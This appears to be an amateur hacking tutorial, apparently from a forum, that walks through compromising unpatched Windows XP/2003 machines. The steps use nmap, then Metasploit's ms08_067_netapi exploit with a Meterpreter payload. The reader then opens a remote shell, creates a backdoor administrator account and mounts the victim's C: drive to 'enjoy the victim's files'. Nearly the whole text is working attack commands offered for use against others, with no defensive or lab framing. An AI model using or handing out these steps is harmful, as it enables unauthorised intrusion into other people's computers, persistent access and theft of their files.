Have you ever wondered how you could login as an Administrator, create your own account and get any files you want from a remote computer???? Well here’s how:
Q: On which Windows can the hack be done?
A: – Windows 2000 SP4
- Windows XP SP1/SP2
- Windows XP Pro x64
- Windows Server 2003 SP1
- Windows Server 2003 x64
Q: From/to what os are you attacking?
A: We are attacking from Debian Linux to Windows XP SP2.
- We download nmap (nmap.org) so that we can scan the remote pc.
- On the terminal we write: nmap -sS -O <target ip>
- If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be.
- Now we download Metasploit (metasploit.org) and we open it via the Terminal.
- Now that Metasploit is running we start the attack.
- We write at the terminal “show exploits” and we get a list of the avaliable exploits.
- We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi”
- Now we set RHOST to our victims ip: “set RHOST <target ip>”
- And RPORT to 445: “set RPORT 445″
- Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0″ and hit ENTER again.
- OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp”
- IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER.
- If everything is ok you should see the following message: “[*] Meterpeter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)
- Meterpeter is running. We are inside the target pc!
- Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i”
- If it says “X:\WINDOWS\System32″ then the mission is accomplished.
- Now lets create our own admin account.
- Write: “net user n0f4t3 mypass /add”. You should see a confirmation message saying “The command completed successfully.”
- Now lets make the account an admin: “net localgroup administrators n0f4t3 /add”.
- You should see again the confirmation message saying: “The command completed successfully.”
- Then type “exit” to exit CMD.
- OMG!! We made it!!! But how can we steal his files????
- We boot from Windows……….
- We go to “Start>Run”, we type “cmd” and we hit ENTER.
- Then we write “net use X: \\<target ip>\C mypass /user:n0f4t3″ and hit ENTER.
- If that doesn’t work type “net use X: \\<target ip>\C: mypass /user:n0f4t3″ and hit ENTER
- Now go to “My Computer” and you should see a new Drive called X:. Open it and enjoy the victim’s files.
That’s all Folks!!!
Microsoft for this great exploit!!
Metasploit and NMap.
Me (N0F@T3) for writing this tut.
MinSteRexS for posting an update!